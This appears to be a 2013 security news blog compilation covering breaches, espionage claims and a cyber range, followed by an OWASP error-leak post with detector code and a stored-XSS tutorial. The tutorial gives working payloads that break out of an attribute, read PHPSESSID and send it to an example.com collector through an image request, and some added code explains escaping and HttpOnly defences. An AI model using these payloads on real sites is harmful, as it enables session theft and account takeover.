    Underscoring the importance of the cyber range to the state, Abercrombie was joined by the state adjutant general, Maj. Gen. Darryl Wong, Honolulu Police Department Chief Louis Kealoha and the top federal prosecutor for Hawaii, Florence Nakakuni, at the ceremony.

    Read more here: http://www.kansascity.com/2013/07/24/4365315/hawaii-cyber-range-launches-anti.html#storylink=cpy


    Exclusive: 'Bigger than phone hacking' - Soca sat on blue-chip dirty tricks evidence for years

    Angry MPs join calls for secret list of those involved as banks and pharmaceutical firms are linked to rogue private investigators


    Banks and pharmaceutical companies are on a secret list of blue-chip firms that hired private investigators who break the law, The Independent has learned.

    The revelation that firms from two of this country’s biggest industries may have commissioned corrupt PIs – without facing prosecution – will fuel concerns that corporations potentially involved in the unlawful trade in private information have so far escaped proper investigation.
    This newspaper has previously revealed that law firms, insurance companies and financial services organisations have used PIs for years to obtain a range of private data.
    Information on the banks and pharmaceutical companies is contained in an explosive list of corrupt PIs’ clients handed to a parliamentary committee by the Serious Organised Crime Agency (Soca). The list of 101 clients also includes some wealthy individuals.
    Following weeks of damaging revelations in The Independent, Soca finally bowed to political pressure earlier this week and privately released to MPs the historical details which its investigators ignored for years.
    However, the agency has classified the material as secret to safeguard individuals’ human rights and protect the “financial viability of major organisations by tainting them with public association with criminality”.
    The decision comes as the newspaper industry is at the centre of the largest criminal investigation in British history over practices including the hiring of corrupt PIs.
    Asked this evening if the classified information contained details of banks and pharmaceutical companies, Keith Vaz, chairman of the Home Affairs Select Committee, said: “This affects all manner of organisations.”
    Mark Lewis, the lawyer who represents the Milly Dowler family and a long-time scourge of Fleet Street, said: “Consistency demands that the same rules apply to all, whether you run a newspaper, a pharmaceutical company or a law firm.
    “As soon as you depart from the equal applicability of law to all, then the law really does become an ass.”
    Trevor Pearce, the director-general of Soca, decided to classify the details of blue-chip companies, in line with Cabinet Office guidelines about sensitive material.
    He demanded the list be “kept in a safe in a locked room, within a secure building and that the document should not be left unattended on a desk at any time”.
    However, in what would amount to a remarkable snub, the committee is so angry with Soca that it is considering releasing the information under parliamentary privilege.
    Mr Vaz said: “We will come to a view as to whether or not we will publish this list. These events took place up to five years ago. Those companies or individuals who either instructed private investigators to break the law or did nothing to stop them must be held to account.”
    It is understood other members of the committee are furious that they are being asked to participate in the cover-up. One source said: “This is bigger than the phone-hacking scandal and the committee does not want to be held accountable when all this comes out in the wash.”
    Last month The Independent revealed that Soca compiled a dossier in 2008 that outlined how firms, individuals and organised crime bosses hired criminal PIs.
    The investigators broke the law to obtain sensitive information, including mobile phone records, bank statements and details of witnesses under police protection.
    Soca was analysing intelligence from mostly Scotland Yard investigations that had also failed to prosecute the offenders for the most serious offences – and completely ignored the blue-chip clients who may have profited from their crimes.
    The report – which showed the practices went far wider than the newspaper industry – was dismissed by Lord Justice Leveson, who considered it fell outside the narrow terms of reference for his inquiry into the media.
    One of five police investigations reviewed by Soca found private detectives listening in to targets’ phone calls in real time. During another police inquiry, the Soca report said officers found a document entitled “The Blagger’s Manual”, which outlined methods of accessing personal information by calling companies, banks, HM Revenue and Customs, councils, utility providers and the NHS.
    Illegal practices identified by Soca investigators went well beyond the relatively simple crime of voicemail hacking and also included police corruption, computer hacking and perverting the course of justice.
    Meanwhile, in an extraordinary joint admission on the Soca website, Mr Pearce and Commander Neil Basu of the Metropolitan Police admit the agency sat for years on evidence of criminality, until it was finally forced to act in May 2011 by former British Army intelligence officer Ian Hurst, whose computer was allegedly hacked by corrupt private investigators.
    Mr Hurst told The Independent: “For reasons that remain unclear, the Leveson Inquiry did not touch the sides with regard to the police. In the final analysis, law enforcement agencies are going to have to justify why they conspired for years to protect the offenders and their clients, which extend way beyond the media.”
    The joint statement also failed to address why Soca has still not passed all its historical evidence to Scotland Yard, which is currently investigating the crimes that the agency ignored.
    Tom Watson, the campaigning Labour MP, said: “Why is the Met Police not in possession of all the information it would usually require to investigate criminal wrongdoing? Why did Soca not give all the physical evidence in the form of the original hard drives to the Met?
    “The Yard and Soca need to provide an urgent explanation as to why the latter is still sitting on a bank of data that any decent police investigator would require to do a proper job.”
    Rob Wilson, a senior Conservative MP, has written to Home Secretary Theresa May calling on her to sack Mr Pearce and Soca chairman Sir Ian Andrews over their refusal to publish the list of blue-chip clients.
    A Soca spokesman said: “Trevor Pearce provided the chair of the committee with further confidential information on 22 July 2013. Soca is unable to comment further on that detail. However, as stated in the DG’s covering letter – which is published on the Soca website – the information provided does not allege, either expressly or by implication, that the individuals and companies named in it, or any individuals working for those companies, have or even may have committed a criminal offence.”


    Tuesday 23 July 2013

    Hacking: A growing threat to Indian IT

    NEW DELHI: The recent data theft by hackers from two Indian companies processing prepaid cards for several overseas banks, which led to a global fraud of 45 million dollars, has made India's 100 billion dollar IT industry a primary target of spam, phishing and viruses. The security breach has reopened the debate on IT security norms followed by Indian firms and the role played by 'ethical' hackers.
    A gang of cyber-criminals operating in 26 countries stole $45 million by hacking their way into a database in the second week of May 2013. Another recent incident is the Rs 2.4 crore heist by cyber criminals who hacked into the Mumbai-based current account of the RPG Group of companies.
    There have been many cases of 'ethical' hackers going rogue, resulting in breaches of the cyber security of companies as well as individuals and causing financial loss and damage to reputation. The 45 million dollar heist, the News International phone hacking scandal, Indian hackers' retaliatory attacks against Brazilian or Bangladeshi counterparts, etc., leave the victims defaced and robbed.
    Reportedly, a group of anonymous hackers from India hacked and defaced 37 Brazilian websites. The attacks were apparently in retaliation to the April 6 cyberattacks on Indian government websites supposedly by Brazil-based hackers. Although there is a nationalistic tinge to the whole scenario, it could prove disastrous if not monitored and channelised.
    Lords of Dharmaraja is also alleged to have hacked and posted a threat by uploading the secret documents, memos, and source code of Symantec's product on Pastebin.
    It is indeed tough to define something as diverse as hacking. Is it ethical for any computer expert to infiltrate another person's websites and e-mail accounts? Yes, if it is a trustworthy 'hacker' who uses his ethics and software expertise to strengthen his employer's security apparatus against hackers with malicious intentions, or if it is done for the cause of national security. But if a computer wizard illegally gains access to someone's computer by pretending to be a bona fide entity in order to fulfil a personal agenda, then that is a cause for serious concern.
    In India, according to Microsoft, 'ethical' hacking is synonymous with prominent names like Ankit Fadia, Sunny Vaghela, Pranav Mistry, Vivek Ramachandran, Koushik Dutta, Aseem Jakhar, Arulselvar and a few more.
    Ankit Fadia, a world-renowned 'ethical' Indian hacker, described the cyber security threat as a menace. "Identity theft of Indian IT firms is rather common. Hackers have the potential to damage the reputation of a bonafide IT firm by stealing their identity and engaging in unscrupulous activities under the corporate's garb that can have disastrous consequence and tarnish reputation. In fact, such misdemeanors could go unnoticed for years together if not detected and rectified in time," he said.
    There are quite a few ethical hacking groups in India, like the Indian Cyber Army aka Indishell, Team NUTS, Team Gray Hat, BriskInfoSec, Lords of Dharmaraja and the Indian Cyber Devils, that have reportedly been working to safeguard India's cyber space.
    An ethical hacking group, on conditions of anonymity, revealed that even while working on a national cause, they may masquerade as an information security company to register domains or create malware in order to protect themselves and get back at their arch-rivals - Information Security and anti-virus companies.
    Imparting ethical hacking training is like treading on dangerous grounds, as it raises questions like are these activities justified? Can there be a guarantee that these groups will refrain from crossing the line of mandate? And, is anyone safe in this scenario?
    In India, there are a number of training institutes that empower the youth in latest ethical hacking tools & techniques. Institutes like Techdefence, K-Secure CEH, IntelleSecure Network Solutions, Crezone, BriskInfoSec and Kyrion are few of them. However, the most popular certification is CEH (Certified Ethical Hacker) by an American organisation called EC Council, and training material of almost every institute is shaped around its curriculum.
    Ethical hacking ensures that the cyber security infrastructure of a private organization as well as government bodies is robust and secure. Although ethical hackers are fast becoming a tribe in India, it is critical to monitor them along with their training institutes. Trainers need to be conscious of imparting this knowledge while setting up the curriculum. Perhaps, it would be prudent for the government to intervene in designing the curriculum and set a minimum age of 18 to shoulder responsibility of such potent knowledge.

    Apple's Developers Website Hacked; Shut Down

    Bangalore: Apple developers around the world were aghast when the website, developer.apple.com, shut down on Thursday last week. At first users took it for a site crash, but today Apple said that it was because of hacking. It also said that information about some of its 275,000 registered third-party developers who use it may have been stolen, reports The Guardian.

    Apple has sent out emails to developers informing them that its developer website was attacked by an outsider last week, AllThingsD reports. The company has stated in the mail that it was due to an intruder’s intervention that it had to shut its developer website. On the safety front, Apple has claimed that since the database and developers’ sensitive personal details had been saved in an encrypted format, these could not be misused by the intruder. However, it has also mentioned that the attacker might have been able to access developers’ names, mailing addresses, and/or email addresses.

    Apple’s developer site had been shut since Thursday and Apple had initially said it was down for maintenance, only now revealing the real cause. According to the note sent to developers, the website will remain shut for security reasons, and will be unavailable until the company hardens the security and provides a better safety system. The note also says that Apple is “completely overhauling our developer systems, updating our server software, and rebuilding our entire database.”

    Apple has not mentioned any detail on when exactly it will reopen for the developers, and has stated that “we expect to have the developer website up again soon.”

    The website is updated now, and is reopened for users.

    The Apple developer site can be used by developers to get access to iOS 7, OS X Mavericks and other software development kits. It also guides developers in putting their apps to beta testers, and comes with developer-only forums.

    Here is the note sent out to the developers:

    Apple Developer Website Update

    Last Thursday, an intruder attempted to secure personal information of our registered developers from our developer website. Sensitive personal information was encrypted and cannot be accessed, however, we have not been able to rule out the possibility that some developers’ names, mailing addresses, and/or email addresses may have been accessed. In the spirit of transparency, we want to inform you of the issue. We took the site down immediately on Thursday and have been working around the clock since then.

    In order to prevent a security threat like this from happening again, we’re completely overhauling our developer systems, updating our server software, and rebuilding our entire database. We apologize for the significant inconvenience that our downtime has caused you and we expect to have the developer website up again soon.

    Best example for OWASP - Security Misconfiguration

    Security Misconfiguration is one of the top 10 OWASP risks for web applications; it may give attackers unauthorized access to some system data or functionality. Occasionally, such flaws result in a complete system compromise.
    Security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. Developers and network administrators need to work together to ensure that the entire stack is configured properly. Automated scanners are useful for detecting missing patches, misconfigurations, use of default accounts, unnecessary services, etc.
    Out of the several vulnerability checks mentioned on the OWASP Security Misconfiguration page, one of the checks is the following:
    Is your error handling set up to prevent stack traces and other overly informative error messages from leaking?
    Recently, while doing doing vulnerability assessment at random for some of the top financial websites, I came across this vulnerability:
    At this stage, if a user enters the mobile number, he is proceeded with normal registration page.
    However, now change the URL manually, and you get an error stacktrace such as following. Notice the change. I changed from execution=e2s1 to execution=1234.
    (screenshot of the stack trace returned by the server)
    The above stack trace reveals a lot about the platform. Key details:
    1. Application server is Apache Tomcat 6.0.26
    2. Component model is based on the Spring Framework
    3. Registration uses Spring Web Flow
    4. Server-side code is written in Java, most probably
    An attacker can use this to learn about the system very easily, and then look up known security holes in the specific software versions and technologies listed above to attack it.
    Solution:
    Configure the application server and framework to return a generic error page for unhandled exceptions (for example Tomcat's <error-page> mapping in web.xml, or a Spring exception resolver) and write the stack trace to the server-side log only, where it is still available for debugging but never reaches the client.
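    The check above is easy to automate. The following is an added example, not code from the original post or from any of the products it names: a response-body check of the kind an automated scanner runs for this OWASP item, which flags an escaped Java stack trace and pulls out the same four platform details listed above. SAMPLE_LEAKY_RESPONSE is a constructed error page modelled on a Tomcat 6 "HTTP Status 500" report for an unparsable Spring Web Flow execution key; its class names, line numbers, reference code and the URL are assumptions for illustration, not a captured response.

```javascript
// Added example, not from the original post. Constructed sample of a Tomcat
// error report leaking a Spring Web Flow exception (class names and line
// numbers are assumed for illustration).
const SAMPLE_LEAKY_RESPONSE = `<html><head><title>Apache Tomcat/6.0.26 - Error report</title></head>
<body><h1>HTTP Status 500 - </h1><p><b>exception</b></p><pre>
org.springframework.webflow.execution.repository.BadlyFormattedFlowExecutionKeyException: The string-encoded flow execution key '1234' is invalid
    at org.springframework.webflow.execution.repository.support.CompositeFlowExecutionKey.parse(CompositeFlowExecutionKey.java:105)
    at org.springframework.webflow.mvc.servlet.FlowHandlerAdapter.handle(FlowHandlerAdapter.java:183)
    at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:790)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
</pre><hr><h3>Apache Tomcat/6.0.26</h3></body></html>`;

// Constructed: what the same request should return once a generic error
// page is configured (the reference code is made up).
const SAMPLE_GENERIC_RESPONSE = `<html><body><h1>Something went wrong</h1>
<p>The error has been logged. Reference: 4f2c9a</p></body></html>`;

// Fingerprints that map onto the four "key details" in the post. Each entry
// either captures a value (server banner with version) or asserts a fact.
const FINGERPRINTS = [
  { key: 'applicationServer', re: /Apache Tomcat\/\d+(?:\.\d+)*/,           value: (m) => m[0] },
  { key: 'framework',         re: /\bat org\.springframework\.(?!webflow)/, value: () => 'Spring Framework' },
  { key: 'webFlow',           re: /org\.springframework\.webflow\./,         value: () => 'Spring Web Flow' },
  { key: 'language',          re: /^\s*at [\w.$]+\([\w$]+\.java:\d+\)/m,     value: () => 'Java' },
];

// A Java stack frame ("at pkg.Class.method(Class.java:NN)") in the body is
// the strongest single signal that an exception escaped to the client.
function leaksStackTrace(body) {
  return /^\s*at [\w.$]+\([\w$]+\.java:\d+\)/m.test(body);
}

// Platform details an attacker could read off the page, keyed as in the
// post's list; an empty object means nothing recognisable leaked.
function platformDetails(body) {
  const found = {};
  for (const { key, re, value } of FINGERPRINTS) {
    const m = re.exec(body);
    if (m) found[key] = value(m);
  }
  return found;
}

// Verdict for one URL/response pair, in the shape a scanner report would use.
// The URL is an assumed placeholder; a real run would feed bodies from an
// HTTP client or a proxy log.
function assessResponse(url, body) {
  return { url, leaks: leaksStackTrace(body), details: platformDetails(body) };
}

const REPORT = assessResponse('https://example.test/register?execution=1234', SAMPLE_LEAKY_RESPONSE);
console.log(JSON.stringify(REPORT, null, 2));
```

    Run against the generic page the same function reports leaks: false and no details, which is the state the fix in the Solution should leave the site in. A scanner that tampers with parameters such as execution and checks each response with assessResponse covers this OWASP item without any knowledge of the application.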

    Sunday 21 July 2013

    Former CIA boss says aware of evidence Huawei spying for China

    A man looks at a Huawei mobile phone as he shops at an electronic market in Shanghai January 22, 2013. REUTERS/Carlos Barria

    (Reuters) - The former head of the U.S. Central Intelligence Agency said he is aware of hard evidence that Huawei Technologies Co Ltd has spied for the Chinese government, the Australian Financial Review newspaper reported on Friday.
    Michael Hayden, also the former head of the U.S. National Security Agency (NSA), said in an interview with the paper that Huawei had "shared with the Chinese state intimate and extensive knowledge of the foreign telecommunications systems it is involved with".
    "I think that goes without saying," he was quoted as saying.
    The newspaper reported Hayden said intelligence agencies have hard evidence of spying activity by the world's No. 2 telecoms equipment maker. It did not detail that evidence.
    Huawei, founded in 1987 by former People's Liberation Army officer Ren Zhengfei, has repeatedly denied being linked to the Chinese government or military or receiving financial support from either.
    Hayden is a director of Motorola Solutions, which provides radios, smart tags, barcode scanners and safety products. Huawei and Motorola Solutions Inc (MSI.N) had previously been engaged in intellectual property disputes for a number of years.
    Huawei Global Cyber Security Officer John Suffolk described the comments made by Hayden as "tired, unsubstantiated defamatory remarks" and challenged him and other critics to present any evidence publicly.
    "Huawei meets the communication needs of more than a third of the planet and our customers have the right to know what these unsubstantiated concerns are," Suffolk said in a statement emailed to Reuters. "It's time to put up or shut up."
    The report came a day after Britain announced it would review security at a cyber centre in southern England run by Huawei to ensure that the British telecommunications network is protected.
    In October 2012, the U.S. House of Representatives' Intelligence Committee urged American firms to stop doing business with Huawei and ZTE Corp. (000063.SZ) (0763.HK), warning that China could use equipment made by the companies to spy on certain communications and threaten vital systems through computerised links.
    The Australian government has barred Huawei from involvement in the building of its A$37.4 billion National Broadband Network.

    Microsoft Hacked: Joins Apple, Facebook, Twitter

    Add Microsoft to the list of leading technology companies that have recently seen their employees' computers get hacked after they visited a third-party website devoted to iOS development.
    According to a Friday "Recent Cyberattacks" blog post from Matt Thomlinson, general manager for trustworthy computing security at Microsoft, the company "recently experienced a similar security intrusion" to the attacks that penetrated the networks of Apple and Facebook.
    "Consistent with our security response practices, we chose not to make a statement during the initial information gathering process," said Thomlinson. "During our investigation, we found a small number of computers, including some in our Mac business unit, that were infected by malicious software using techniques similar to those documented by other organizations. We have no evidence of customer data being affected and our investigation is ongoing."
    Thomlinson's short statement squares with what's already known about the attacks, based on previously issued public comments from Apple, Facebook and Twitter. Namely, in what's called a watering-hole attack, whoever launched these attacks first compromised the popular iPhoneDevSDK website, without tipping off the website's administrator, and then used the site to launch drive-by attacks against anyone who visited. The attacks, which targeted a zero-day vulnerability in the Java browser plug-in that's since been patched by Oracle, were obviously quite effective, because they affected OS X systems at Apple, Facebook, Microsoft and Twitter.
    Microsoft's public statement also suggests that many more than just those four businesses may have been successfully compromised by attackers.
    What were attackers seeking? One likely answer is that they were simply trawling for any customer data or proprietary company information that would have resale value on the black market, for example to better customize phishing attacks.
    But Sean Sullivan, security advisor at F-Secure Labs, has also warned that the attackers may have had their eye on adding backdoor code -- that executes after a time delay -- into mobile iOS apps under development. "Apple and Google's app stores don't review source code, [they] just run the apps," said Sullivan via email. So, thinking like an attacker: "I would inject code that only enables itself in certain circumstances and at certain times (and build a botnet that way)," he said.
    Accordingly, Sullivan recommends that all security managers review their employees' website-visiting logs to see if anyone visited iPhoneDevSDK, as well as review their mobile application code bases to look for unauthorized changes. In addition, any businesses -- and especially smaller organizations -- that thought they weren't a target should put a security plan in place to mitigate future zero-day attacks that target their developers. "They should be more proactive (paranoid) in the first place," Sullivan said. "Small startups probably mix work and play. They shouldn't. Buy your developers an additional laptop for just work."

    Friday 19 July 2013

    Simple Cross Site Scripting (XSS) Example

    Introduction

    This article will try to demonstrate and explain one of the many ways XSS is used. The example is based on a previous vulnerability in the profile edit page at HackThis!! (this vulnerability has since been patched), but it is applicable to a lot of places all around the internet. The article will start off by briefly going through how to find a vulnerability that can be used for XSS, and then show the steps necessary to exploit it. The goal of our exploit will be to gain access to the site as another user by stealing his/her “PHPSESSID” cookie.

    Finding a vulnerability

    The first step when it comes to finding a vulnerability is to find a field, or a parameter, that is processed by the server and then printed somewhere on the page. A good example could be a search field, since sites usually include the original search query somewhere on the result page (no, Google is not vulnerable). However, search fields have the disadvantage of, in most cases, being non-persistent (see http://en.wikipedia.org/wiki/Cross-site_scripting#Types for the difference between a persistent and a non-persistent XSS vector). A much better field would be one whose value is saved, such as the fields on the profile edit page. In this example I decided to try the username field on the edit profile page.

    (screenshot of the profile edit page, showing the username field)

    Testing a vulnerability

    The next step is to check whether the field is vulnerable or not. Depending on where on the page this field is later printed, the process differs a bit. The field I chose, the username field on the profile edit page, had its input printed in the value attribute of the input field itself (see the image above). The first thing you want to do if your value is printed inside an attribute is to “break out” of the attribute assignment. In my case that means closing the opening quote.
    Code:
    Name entered: testing"testing
    
    <label for="name">Real Name:</label><br/>
    <input name="name" value="testing"testing" />

    As you can see above, the quote entered into the field isn’t filtered, and the text following it is no longer part of the value attribute of the username field. That means it’s time to insert some JavaScript.

    Once you have found a field that lets you insert HTML into the page, it’s time to take advantage of it. Let’s start with something easy, just to make sure it really works.
    Code:
    Name entered: "/><script>alert('xss');</script>
    
    <label for="name">Real Name:</label><br/>
    <input name="name" value=""/><script>alert('xss');</script>" />

    If you’ve gotten this far without any filter stopping you, then you’re lucky: the field you chose is vulnerable, and we can go ahead and start exploiting it.
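    To see exactly why the second payload works and what stops it, here is an added example that is not code from the original article or from HackThis!!: the profile field rendered the vulnerable way the markup above implies, and the same template with the input encoded for the attribute context. Both templates are stand-ins for the site's real server-side code, which the article does not show; readBackValue and tagCount are small helpers written for this example to make the break-out visible without a browser.

```javascript
// Added example, not from the original article. The two render functions
// are assumed stand-ins for the site's template.

// Encode the characters that can end an attribute value or start a tag.
function escapeAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: user input dropped straight into value="...".
function renderUnsafe(name) {
  return `<label for="name">Real Name:</label><br/>\n<input name="name" value="${name}" />`;
}

// Hardened: same template, input encoded for the attribute context.
function renderSafe(name) {
  return `<label for="name">Real Name:</label><br/>\n<input name="name" value="${escapeAttr(name)}" />`;
}

// What a browser will treat as the field's value: the text between value="
// and the next double quote, with the attribute entities decoded again.
function readBackValue(html) {
  const m = /value="([^"]*)"/.exec(html);
  if (!m) return null;
  const back = { amp: '&', lt: '<', gt: '>', quot: '"', '#x27': "'" };
  return m[1].replace(/&(amp|lt|gt|quot|#x27);/g, (_, e) => back[e]);
}

// Number of tags in the markup. The clean form has exactly four
// (<label>, </label>, <br/>, <input>); any extra tag came from the input.
function tagCount(html) {
  return (html.match(/<\/?[a-z]/gi) || []).length;
}

function breaksOut(html) {
  return tagCount(html) > 4;
}

// The two names entered in the walkthrough above.
const PAYLOAD_PROBE  = 'testing"testing';
const PAYLOAD_SCRIPT = `"/><script>alert('xss');</script>`;

console.log(renderUnsafe(PAYLOAD_SCRIPT));  // <script> becomes its own tag
console.log(renderSafe(PAYLOAD_SCRIPT));    // stays inside value="..."
```

    With the unsafe template the first probe silently truncates the stored value to "testing" and the second one adds two tags to the page; with the hardened template both names survive the round trip unchanged and the tag count stays at four. The encoding is context-specific: this helper is right for a double-quoted attribute, and a value printed into a script block or a URL needs a different encoder.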

    Getting the cookie

    As said earlier, we want to get the PHPSESSID cookie. So how would we do that? Luckily for us there is an easy way to get the current cookie(s) in javascript.
    Code:
    <script>alert(document.cookie);</script>

    The document.cookie string looks something like this (without the line-breaks):
    Code:
    PHPSESSID=1234567890abcdef1234567890abcdef;
    _utma=227779588.370893646.1344613812.1344699114.1344703344.10;
    __utmc=227779588;
    __utmz=227779588.1344613812.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

    The string returned, as you can see, contains all the cookies for the current page that are readable from script (a cookie set with the HttpOnly flag is never included, which is exactly why session cookies should carry it). We only really care about the PHPSESSID, so let’s filter the cookie string a bit.
    Code:
    var cookieString = document.cookie;
    var sessIDMatch = /PHPSESSID=(\w+)/.exec(cookieString);
    var sessID = sessIDMatch[1];

    This script is unnecessarily long, however. Most fields (especially on a profile edit page) have some kind of length limit, and you will usually have to optimize your script in order to stay under it. So let’s shorten it down a bit. Often this can be done using either Google’s Closure Compiler, http://closure-compiler.appspot.com (use the “simple” setting), or the JavaScript packer, http://dean.edwards.name/packer/ (shrink variables but don’t base 62 encode). In this case, though, it was better to do it manually, mostly because we are using regular expressions.
    Code:
    a=/D=(\w+)/.exec(document.cookie)[1];

    Note how we are able to use only the capital D from PHPSESSID in our regular expression, as we know that no other cookie name on this site ends with a capital D.

    Stealing the cookie

    Now that we have found a way to extract the session cookie, we need some way to steal it. For this step you will need to set up your own collector script on another server that receives the sent cookie. Depending on how “sneaky” you want to be there are a lot of different ways, the easiest being a straightforward redirect to your page, while a more hidden way would be using AJAX to send the data in the background. For this example we will be using a third method, an image.
    Code:
    a=/D=(\w+)/.exec(document.cookie)[1];$('<img>').attr('src','http://example.com/xss.php?s='+a)

    There is nothing fancy going on here: we simply create an <img> tag and set its src attribute to the URL of our cookie collector script, with the session id included in the query string. The browser requests that URL as soon as src is set, even though the element is never added to the page, and that request is what delivers the cookie. In this example I’ve used jQuery, as it is available on HackThis!!, but it’s also possible to create the img tag using, for example, the document.createElement approach. The jQuery method is considerably shorter, however, and, as already mentioned, shorter is in these circumstances often better.
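    The cookie extraction from “Getting the cookie” and the exfiltration just described can be exercised offline. The following is an added example, not the article's code: it runs the long and the shortened regex against the cookie string shown earlier, shows the one case where the “D=” shortcut returns the wrong value, shows what happens when PHPSESSID is HttpOnly, and builds and reads back the collector URL. The collector URL is the article's placeholder, COOKIE_WITH_UID and COOKIE_HTTPONLY are constructed strings standing in for document.cookie, and nothing is sent anywhere.

```javascript
// Added example, not from the original article. document.cookie is replaced
// by constructed strings so this runs outside a browser.
const SAMPLE_COOKIE =
  'PHPSESSID=1234567890abcdef1234567890abcdef; ' +
  '_utma=227779588.370893646.1344613812.1344699114.1344703344.10; ' +
  '__utmc=227779588; ' +
  '__utmz=227779588.1344613812.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)';

// Constructed: a site that also sets a cookie whose name ends in "D" before
// the session cookie; this is where the shortened regex goes wrong.
const COOKIE_WITH_UID = 'UID=42; ' + SAMPLE_COOKIE;

// Constructed: what script sees when PHPSESSID is set with the HttpOnly
// flag; the browser simply leaves it out of document.cookie.
const COOKIE_HTTPONLY = SAMPLE_COOKIE.replace(/^PHPSESSID=\w+; /, '');

// Long form from the article.
function sessionIdLong(cookie) {
  const m = /PHPSESSID=(\w+)/.exec(cookie);
  return m ? m[1] : null;
}

// Shortened form from the article: the first "D=" in the string wins.
function sessionIdShort(cookie) {
  const m = /D=(\w+)/.exec(cookie);
  return m ? m[1] : null;
}

// Attacker side: the URL the injected <img> will request. The id is
// URL-encoded here, which the article's one-liner skips to save characters.
function exfilUrl(collector, sessId) {
  return collector + '?s=' + encodeURIComponent(sessId);
}

// Markup equivalent of $('<img>').attr('src', ...) for a page without jQuery;
// null when there is no session id to send.
function imgPayload(collector, cookie) {
  const id = sessionIdLong(cookie);
  return id === null ? null : `<img src="${exfilUrl(collector, id)}">`;
}

// Collector side: what xss.php (or any server) reads out of the request.
function collectorReads(requestUrl) {
  return new URL(requestUrl).searchParams.get('s');
}

const COLLECTOR = 'http://example.com/xss.php';
console.log(imgPayload(COLLECTOR, SAMPLE_COOKIE));
console.log('shortcut on UID site:', sessionIdShort(COOKIE_WITH_UID));
console.log('HttpOnly session:', imgPayload(COLLECTOR, COOKIE_HTTPONLY));
```

    Two things worth taking away: the shortened regex is only as safe as the assumption behind it (on a site that sets UID before PHPSESSID it hands the collector "42"), and the whole attack is dead on arrival when the session cookie is HttpOnly, which is the cheapest defence the site could have deployed.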

    Conclusion

    With that our simple XSS attack is actually complete. If we had found a field that exposed our script to other members of the site and not only to ourselves (as in my case), all we would have had to do now is sit back and wait for someone to stumble across our malicious page. In my case, though, there are a couple of additional steps required to make the exploit work. But that is for a later time.

    Thanks for reading, and feel free to send me a PM or leave a comment if there is anything you are wondering about.